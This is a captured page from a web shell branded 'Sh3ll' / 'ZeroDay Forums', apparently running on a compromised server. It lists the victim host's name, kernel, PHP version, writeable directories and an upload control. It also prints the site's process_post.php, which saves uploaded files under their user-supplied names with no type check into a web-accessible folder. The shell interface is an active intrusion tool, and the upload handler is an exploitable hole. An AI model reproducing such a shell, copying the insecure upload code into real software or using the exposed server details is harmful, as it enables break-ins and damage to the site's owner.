Sh3ll
OdayForums


Server : Apache
System : Linux server1.cgrithy.com 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : nobody ( 99)
PHP Version : 8.1.23
Disable Function : NONE
Directory :  /home/dnlcambodia/www/dnl_dashboard/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/dnlcambodia/www/dnl_dashboard/process_post.php
<?php

include './PHP/config/db_conn.php';

// Check if the form is submitted
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // Retrieve form data
    $title = isset($_POST["title"]) ? $_POST["title"] : '';
    $content = isset($_POST["content"]) ? $_POST["content"] : '';
    $date = isset($_POST["date"]) ? $_POST["date"] : '';
    $postedBy = isset($_POST["posted_by"]) ? $_POST["posted_by"] : '';
    $tag = isset($_POST["tag"]) ? $_POST["tag"] : '';

    // Handle file upload if file is set
    if (isset($_FILES["file"]) && $_FILES["file"]["error"] == UPLOAD_ERR_OK) {
        // Handle file upload
        $targetDirectory = "./uploads/";
        $targetFile = $targetDirectory . basename($_FILES["file"]["name"]);

        // Move the uploaded file to the target location
        if (move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) {
            // Insert data into the database using prepared statements
            $sql = "INSERT INTO posts (title, content, date, posted_by, tag, image) VALUES (?, ?, ?, ?, ?, ?)";
            $stmt = $conn->prepare($sql);

            // Check if the statement is prepared successfully
            if ($stmt) {
                // Bind parameters to the placeholders
                $stmt->bind_param("ssssss", $title, $content, $date, $postedBy, $tag, $targetFile);

                // Execute the statement
                if ($stmt->execute()) {
                    echo "<h2>Post submitted successfully!</h2>";
                } else {
                    echo "<h2>Error submitting post. Please try again.</h2>";
                }

                // Close the statement
                $stmt->close();
            } else {
                echo "<h2>Error preparing statement. Please try again.</h2>";
            }
        } else {
            echo "<h2>Error uploading file. Please try again.</h2>";
        }
    } else {
        echo "<h2>No file uploaded or file upload error. Please try again.</h2>";
    }

    // Close the database connection
    $conn->close();
} else {
    // If the form is not submitted, redirect to the form page
    header("Location: test.html");
    exit();
}
?>

ZeroDay Forums Mini